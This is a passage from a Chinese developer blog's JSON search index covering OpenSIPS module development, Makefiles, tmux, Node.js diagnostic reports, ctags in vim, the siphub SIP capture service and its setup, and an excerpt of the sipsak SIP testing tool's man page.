*/ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* 
pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function\ntypedef int (*cmd_function)(struct sip_msg*, char*, char*, char*, char*, char*, char*); cmd_function与fixup_function的关系 cmd_function是在opensips运行后,在路由脚本中会执行到 fixup_function实际上是在opensips运行前,脚本解析完成后会执行 fixup_function的目的是在脚本解析阶段发现参数的问题,或者修改某些参数的值 真实的栗子:\nstatic cmd_export_t cmds[]={ {\u0026#34;lzc_change\u0026#34;, (cmd_function)change_code, 2, change_code_fix, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; static int change_code_fix(void** param, int param_no) { LM_INFO(\u0026#34;enter change_code_fix: param: %s\\n\u0026#34;, (char *)*param); LM_INFO(\u0026#34;enter change_code_fix: param_no: %d\\n\u0026#34;, param_no); LM_INFO(\u0026#34;enter change_code_fix: local_zone_code: %s len:%d\\n\u0026#34;, local_zone_code.s,local_zone_code.len); return 0; } 上面的定义,可以在opensips脚本中使用lzc_change这个函数。这个函数对应c代码里的change_code函数。这个函数允许接受2两个参数。\nopensips脚本\nroute{ lzc_change(\u0026#34;abcd\u0026#34;,\u0026#34;desf\u0026#34;); } debug日志:从日志可以看出来lzc_change有两个参数,change_code_fix被调用了两次,每次调用可以获取参数的值,和参数的序号。\nDBG:core:fix_actions: fixing lzc_change, opensips.mf2.cfg:18 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: abcd INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 1 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: desf INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 2 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 ","permalink":"https://wdd.js.org/opensips/module-dev/l5/","summary":"module_exports 
这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重点讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有哪些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function","title":"概念理解 module_exports"},{"content":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefile, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","permalink":"https://wdd.js.org/posts/2020/08/rudtng/","summary":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefile, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","title":"统一入口Makefile"},{"content":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在继续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要在客户端和服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:session, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在session,window和panel之间跳转。\n注意:默认情况下,一个session默认会打开一个window, 
一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。\n在做代码对比,或者一遍参考另一个代码,一遍写当前代码时,可以考虑使用pane分屏。\n垂直分屏: ctrl-b % 水平分屏: ctrl-b \u0026quot; 依次切换: ctrl-b o 按箭头键切换: ctrl-b 箭头 重新布局: ctrl-b 空格键 最大化当前pane: ctrl-b z 关闭当前pane: ctrl-b x 将panne转为新的window: ctrl-b ! 显示Pannel编号 ctrl-b q 向左移动pannel ctrl-b { 向右移动pannel ctrl-b } resize panne\nresize-pane -D 20 resize down resize-pane -U 20 resize up resize-pane -L 20 resize left resize-pane -R 20 resize right 杂项 查看时间: ctrl-b t 内部操作 当你已经进入tmux时,如何新建一个session或者关闭一个session呢?\n新建session ctrl-b : 进入命令行模式,然后输入: new -s session-name 关闭sesssion ctrl-b : 进入命令行模式,然后输入: kill-session -t session-name tmux 设置活跃window的状态栏背景色 # tmux 1.x set-window-option -g window-status-current-bg red # tmux 2.9 setw -g window-status-current-style fg=black,bg=white 参考 https://unix.stackexchange.com/questions/210174/set-the-active-tmux-tab-color ","permalink":"https://wdd.js.org/posts/2020/08/osz3gu/","summary":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 
可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。","title":"tmux深度教学"},{"content":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","permalink":"https://wdd.js.org/posts/2020/08/lrzu06/","summary":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","title":"打造高可扩展性的微服务"},{"content":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 
诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=... causes diagnostic report to be produced on provided signal. Unsupported in Windows. (default: SIGUSR2) --diagnostic-report-uncaught-exception generate diagnostic report on uncaught exceptions 产生报告当出现未捕获的异常 --diagnostic-report-directory=... define custom report pathname. (default: current working directory of Node.js process) --diagnostic-report-filename=... define custom report file name. (default: YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt) 参考 https://nodejs.org/dist/latest-v12.x/docs/api/report.html https://ibm.github.io/report-toolkit/quick-start https://developer.ibm.com/technologies/node-js/articles/introducing-report-toolkit-for-nodejs-diagnostic-reports ","permalink":"https://wdd.js.org/fe/nodejs-report/","summary":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 
诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动触发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node --help | grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=.","title":"Nodejs诊断报告"},{"content":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目根目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读取当前目录下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","permalink":"https://wdd.js.org/posts/2020/08/ed6944/","summary":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 
那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目根目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读取当前目录下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","permalink":"https://wdd.js.org/posts/2020/08/ed6944/","summary":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目根目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读取当前目录下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","title":"vim ctags安装及使用"},{"content":"我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test with OpenSIPS 2.4\n# add hep listen listen=hep_udp:your_ip:9061 loadmodule \u0026#34;proto_hep.so\u0026#34; # replace SIP_HUB_IP_PORT with siphub‘s ip:port modparam(\u0026#34;proto_hep\u0026#34;, \u0026#34;hep_id\u0026#34;,\u0026#34;[hep_dst] SIP_HUB_IP_PORT;transport=udp;version=3\u0026#34;) loadmodule \u0026#34;siptrace.so\u0026#34; modparam(\u0026#34;siptrace\u0026#34;, \u0026#34;trace_id\u0026#34;,\u0026#34;[tid]uri=hep:hep_dst\u0026#34;) # add 
ite in request route(); if(!is_method(\u0026#34;REGISTER\u0026#34;) \u0026amp;\u0026amp; !has_totag()){ sip_trace(\u0026#34;tid\u0026#34;, \u0026#34;d\u0026#34;, \u0026#34;sip\u0026#34;); } FreeSWITCH集成 fs 版本要高于 1.6.8+\n编辑: sofia.conf.xml\n用真实的siphub ip:port替换SIP_HUB_IP_PORT\n\u0026lt;param name=\u0026#34;capture-server\u0026#34; value=\u0026#34;udp:SIP_HUB_IP_PORT\u0026#34;/\u0026gt; freeswitch@fsnode04\u0026gt; sofia global capture on +OK Global capture on freeswitch@fsnode04\u0026gt; sofia global capture off +OK Global capture off 注意:sip_profiles里面的也要设置为yes\nsip_profiles/internal.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external-ipv6.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; ","permalink":"https://wdd.js.org/opensips/tools/siphub/","summary":"我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub 
wangduanduan/siphub 集成 OpenSIPS集成 test with OpenSIPS 2.","title":"siphub 轻量级实时SIP信令收包的服务"},{"content":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are useful for admins and developers of SIP environments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility. It sends SIP requests to the server within the sip-uri and examines received responses. It runs in one of the following modes: - default mode A SIP message is sent to destination in sip-uri and reply status is displayed. The request is either taken from filename or generated as a new OPTIONS message. - traceroute mode (-T) This mode is useful for learning request\u0026#39;s path. It operates similarly to IP-layer utility traceroute(8). - message mode (-M) Sends a short message (similar to SMS from the mobile phones) to a given target. With the option -B the content of the MESSAGE can be set. Useful might be the options -c and -O in this mode. - usrloc mode (-U) Stress mode for SIP registrar. sipsak keeps registering to a SIP server at high pace. Additionally the registrar can be stressed with the -I or the -M option. If -I and -M are omitted sipsak can be used to register any given contact (with the -C option) for an account at a registrar and to query the current bindings for an account at a registrar. - randtrash mode (-R) Parser torture mode. 
sipsak keeps sending randomly corrupted messages to torture a SIP server\u0026#39;s parser. - flood mode (-F) Stress mode for SIP servers. sipsak keeps sending requests to a SIP server at high pace. If libruli (http://www.nongnu.org/ruli/) or c-ares (http://daniel.haxx.se/projects/c-ares/) support is compiled into the sipsak binary, then first a SRV lookup for _sip._tcp.hostname is made. If that fails a SRV lookup for _sip._udp.hostname is made. And if this lookup fails a normal A lookup is made. If a port was given in the target URI the SRV lookup is omitted. Failover, load distribution and other transports are not supported yet. OPTIONS -a, --password PASSWORD With the given PASSWORD an authentication will be tryed on received \u0026#39;401 Unauthorized\u0026#39;. Authorization will be tryed on time. If this option is omitted an authorization with an empty password (\u0026#34;\u0026#34;) will be tryed. If the password is equal to - the password will be read from the standard input (e.g. the keyboard). This prevents other users on the same host from seeing the password the password in the process list. NOTE: the password still can be read from the memory if other users have access to it. -A, --timing prints only the timing values of the test run if verbosity is zero because no -v was given. If one or more -v were given this option will be ignored. -b, --apendix-begin NUMBER The starting number which is appended to the user name in the usrloc mode. This NUMBER is increased until it reaches the value given by the -e parameter. If omitted the starting number will be one. -B, --message-body STRING The given STRING will be used as the body for outgoing MESSAGE requests. -c, --from SIPURI The given SIPURI will be used in the From header if sipsak runs in the message mode (initiated with the -M option). This is helpful to present the receiver of a MESSAGE a meaningfull and usable address to where maybe even responses can be send. 
-C, --contact SIPURI This is the content of the Contact header in the usrloc mode. This allows to insert forwards like for mail. For example you can insert the uri of your first SIP account at a second account, thus all calls to the second account will be for‐ warded to the first account. As the argument to this option will not be enclosed in brackets you can give also multiple contacts in the raw format as comma separated list. The special words empty or none will result in no contact header in the REGISTER request and thus the server should answer with the current bindings for the account at the registrar. The special words * or star will result in Contact header containing just a star, e.g. to remove all bindings by using expires value 0 together with this Contact. -d, --ignore-redirects If this option is set all redirects will be ignored. By default without this option received redirects will be respected. This option is automatically activated in the randtrash mode and in the flood mode. -D, --timeout-factor NUMBER The SIP_T1 timer is getting multiplied with the given NUMBER. After receiving a provisional response for an INVITE request, or when a reliable transport like TCP or TLS is used sipsak waits for the resulting amount of time for a final response until it gives up. -e, --appendix-end NUMBER The ending number which is appended to the user name in the usrloc mode. This number is increased until it reaches this ending number. In the flood mode this is the maximum number of messages which will be send. If omitted the default value is 2^31 (2147483647) in the flood mode. -E, --transport STRING The value of STRING will be used as IP transport for sending and receiving requests and responses. This option over‐ writes any result from the URI evaluation and SRV lookup. Currently only \u0026#39;udp\u0026#39; and \u0026#39;tcp\u0026#39; are accepted as value for STRING. 
-f, --filename FILE The content of FILE will be read in in binary mode and will be used as replacement for the alternatively created sip mes‐ sage. This can used in the default mode to make other requests than OPTIONS requests (e.g. INVITE). By default missing carriage returns in front of line feeds will be inserted (use -L to de-activate this function). If the filename is equal to - the file is read from standard input, e.g. from the keyboard or a pipe. Please note that the manipulation functions (e.g. inserting Via header) are only tested with RFC conform requests. Additionally special strings within the file can be replaced with some local or given values (see -g and -G for details). -F, --flood-mode This options activates the flood mode. In this mode OPTIONS requests with increasing CSeq numbers are sent to the server. Replies are ignored -- source port 9 (discard) of localhost is advertised in topmost Via. -h, --help Prints out a simple usage help message. If the long option --help is available it will print out a help message with the available long options. -g, --replace-string STRING Activates the replacement of $replace$ within the request (usually read in from a file) with the STRING. Alternatively you can also specify a list of attribute and values. This list has to start and end with a non alpha-numeric character. The same character has to be used also as separator between the attribute and the value and between new further attribute value pairs. The string \u0026#34;$attribute$\u0026#34; will be replaced with the value string in the message. -G, --replace Activates the automatic replacement of the following variables in the request (usually read in from a file): $dsthost$ will be replaced by with the host or domainname which is given by the -s parameter. $srchost$ will be replaced by the hostname of the local machine. $port$ will be replaced by the local listening port of sipsak. 
$user$ will be replaced by the username which is given by the -s parameter. -H, --hostname HOSTNAME Overwrites the automatic detection of the hostname with the given parameter. Warning: use this with caution (preferable only if the automatic detection fails). -i, --no-via Deactivates the insertion of the Via line of the localhost. Warning: this probably disables the receiving of the responses from the server. -I, --invite-mode Activates the Invites cycles within the usrloc mode. It should be combined with -U. In this combination sipsak first registeres a user, and then simulates an invitation to this user. First an Invite is sent, this is replied with 200 OK and finally an ACK is sent. This option can also be used without -U , but you should be sure to NOT invite real UAs with this option. In the case of a missing -U the -l PORT is required because only if you made a -U run with a fixed local port before, a run with -I and the same fixed local port can be successful. Warning: sipsak is no real UA and invita‐ tions to real UAs can result in unexpected behaivior. -j, --headers STRING The string will be added as one or more additional headers to the request. The string \u0026#34;\\n\u0026#34; (note: two characters) will be replaced with CRLF and thus result in two separate headers. That way more then one header can be added. -J, --autohash STRING The string will be used as the H(A1) input to the digest authentication response calculation. Thus no password from the -a option is required if this option is provided. The given string is expected to be a hex string with the length of the used hash function. -k, --local-ip STRING The local ip address to be used -l, --local-port PORT The receiving UDP socket will use the local network port. Useful if a file is given by -f which contains a correct Via line. Check the -S option for details how sipsak sends and receives messages. 
-L, --no-crlf De-activates the insertion of carriage returns (\\r) before all line feeds (\\n) (which is not already proceeded by car‐ raige return) if the input is coming from a file ( -f ). Without this option also an empty line will be appended to the request if required. -m, --max-forwards NUMBER This sets the value of the Max-Forward header field. If omitted no Max-Forward field will be inserted. If omitted in the traceroute mode number will be 255. -M, --message-mode This activates the Messages cycles within the usrloc mode (known from sipsak versions pre 0.8.0 within the normal usrloc test). This option should be combined with -U so that a successful registration will be tested with a test message to the user and replied with 200 OK. But this option can also be used without the -U option. Warning: using without -U can cause unexpected behaivor. -n, --numeric Instead of the full qualified domain name in the Via line the IP of the local host will be used. This option is now on by default. -N, --nagios-code Use Nagios comliant return codes instead of the normal sipsak ones. This means sipsak will return 0 if everything was ok and 2 in case of any error (local or remote). -o, --sleep NUMBER sipsak will sleep for NUMBER ms before it starts the next cycle in the usrloc mode. This will slow down the whole test process to be more realistic. Each cycle will be still completed as fast as possible, but the whole test will be slowed down. -O, --disposition STRING The given STRING will be used as the content for the Content-Disposition header. Without this option there will be no Content-Disposition header in the request. -p, --outbound-proxy HOSTNAME[:PORT] the address of the hostname is the target where the request will be sent to (outgoing proxy). Use this if the destination host is different then the host part of the request uri. The hostname is resolved via DNS SRV if supported (see descrip‐ tion for SRV resolving) and no port is given. 
-P, --processes NUMBER Start NUMBER of processes in parallel to do the send and reply checking. Only makes sense if a higher number for -e is given in the usrloc, message or invite mode. -q, --search REGEXP match replies against REGEXP and return false if no match occurred. Useful for example to detect server name in Server header field. -r, --remote-port PORT Instead of the default sip port 5060 the PORT will be used. Alternatively the remote port can be given within the sip uri of the -s parameter. -R, --random-mode This activates the randtrash mode. In this mode OPTIONS requests will be send to server with increasing numbers of ran‐ domly crashed characters within this request. The position within the request and the replacing character are randomly chosen. Any other response than Bad request (4xx) will stop this mode. Also three unresponded sends will stop this mode. With the -t parameter the maximum of trashed characters can be given. -s, --sip-uri SIPURI This mandatory option sets the destination of the request. It depends on the mode if only the server name or also an user name is mandatory. Example for a full SIPURI : sip:test@foo.bar:123 See the note in the description part about SRV lookups for details how the hostname of this URI is converted into an IP and port. -S, --symmetric With this option sipsak will use only one port for sending and receiving messages. With this option the local port for sending will be the value from the -l option. In the default mode sipsak sends from a random port and listens on the given port from the -l option. Note: With this option sipsak will not be able to receive replies from servers with asym‐ metric signaling (and broken rport implementation) like the Cisco proxy. If you run sipsak as root and with raw socket support (check the output from the -V option) then this option is not required because in this case sipsak already uses only one port for sending and receiving messages. 
